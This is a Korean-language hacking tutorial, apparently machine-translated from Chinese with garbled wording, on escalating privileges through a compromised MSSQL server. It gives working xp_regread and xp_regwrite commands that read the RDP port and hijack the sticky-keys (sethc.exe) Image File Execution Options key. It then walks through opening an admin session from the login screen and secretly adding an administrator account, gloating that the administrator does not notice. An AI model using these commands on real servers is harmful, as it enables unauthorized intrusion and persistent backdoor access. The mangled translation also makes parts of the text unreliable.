권리 제시 조건: 1.서버가 터미널 포트를 열었습니다(터미널 포트가 반드시 3389는 아니므로 자체적으로 조회할 수 있습니다). 2.서버의 점착 키 기능은 손상되지 않으며 정상적으로 튀어나올 수만 있다면 3.서버가 등록표 편집(즉 쓰기 기능)을 금지하지 않았습니다. 한마디: 1433 권한 제시는 만능인 방법이 없습니다. 때로는 여러 가지 방법이 결합되어야 합니다. 관리자의 안전 의식이 향상되었습니다. 지금은 몇 년 전처럼 단순한 cmdshll로 언급할 수 없습니다.cpp: 오류 5 CreateProcess(737행)가 예전에 어로수업에서 cmd라고 했어요.exe의 권한이 제한되고 돌아가는 방법을 제공합니다. 여기서 더 이상 설명하지 않겠습니다. 이전 강좌 아래에서 서버의 관련 자료와 정보를 수집하여 sql 명령을 사용하여 서버의 버전 등 관련 정보를 조회할 수 있도록 하십시오. EXEC xp_구성 요소 xplog70으로 인해 msver.dll이 삭제되어 표시할 수 없습니다. 다음은 터미널 정보 sql 명령을 보고 서버 터미널 포트를 읽습니다:exec master...xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\Current ControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'단말 포트는 3389로 테스트 단말기 포트를 연결하고 shift 점착 키 기능이 정상적으로 연결되는지 테스트합니다. 점착 키 테스트는 정상적으로 튀어나오고 다른 정보를 수집합니다. c판 아래에 sql의 설치 디렉터리가 있습니다. 이것은 좋은 것입니다. 예전에 물고기를 가르쳐 드렸듯이 아래를 직접 보세요.12만 분의 관심을 가지고 세 가지 명령을 먼저 발표하세요. 1.sql 명령은 등록표 점착 키가 exec 마스터를 납치당했는지 조회합니다.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'2.sql 명령은 등록표 점착 키 기능을 납치하여 작업 관리자로 바꿉니다 (물론 당신이 원하는 다른 명령으로 바꿉니다) xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'3.sql 명령은 등록표 점착 키의 납치 기능을 삭제하여 서버가 다른 사람에게 xp_를 이용하지 않도록 보호합니다regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'됐어, 우리가 교체해서 등록표에 정확하게 썼는지 조회해 보자. 조회 결과 정상적으로 썼어. 밑에 단말기를 연결하고 다섯 번shift, 귀여운 작업 관리자가 튀어나왔어. 존경하는 관리자가 아직 위에 있어. 우리가 몰래 잠입하고 있는 줄은 몰랐어. 너무 재미있어.다음 그림을 보십시오. 점파일 - 새 작업입니다. explorer의 작업을 새로 만듭니다. 프로그램이 실행된 후에 임시 데스크톱 시스템을 보았습니다. 계산 관리 도구를 엽니다. 뭐라고요?못 켜요?그 학생, 컴퓨터 시스템 지식을 배워야 합니다. 먼저 제 컴퓨터를 오른쪽 단추로 누르고 메뉴 관리를 팝업합니다. 이때 우리는 컴퓨터 관리 도구에 있는 로컬 사용자와 그룹을 찾아서 사용자의 옵션을 열고 새 계정과 비밀번호를 추가합니다.여기에서 당신은 cmd 명령을 찾아서 사용자를 만들 수 있습니다. 물론, 이 때 cmd의 권한은 비활성화되어 있으며, 권한을 바꾸어야 합니다. 비교적 번거롭습니다. 다른 디렉터리에서 cmd를 찾을 수도 있습니다.exe, 몇몇 권한이 잘 설정되지 않으면 실행할 수 있습니다. 여기서 우리는 컴퓨터 관리로 사용자를 만들 수 있습니다. 패스트푸드면을 먹는 것으로 간주하면 편리합니다.문제 풀렸어요. 문제 풀렸어요.당연히 새로 만든 계정을 관리팀에 추가해야 합니다. 발가락으로 생각하는 사람은 모두 알고 있습니다 *^_^*모든 것이 KO되었다. 아니, OK일 것이다. 그러면 단말기 로그인을 하자. 성과를 보자. 헤헤, 괜찮은 서버다.
http://www.spiger.cn/article/145.html “ ”→“ ”, “ ” “Rundll32 netplwiz.dll,UsersRunDll” ( )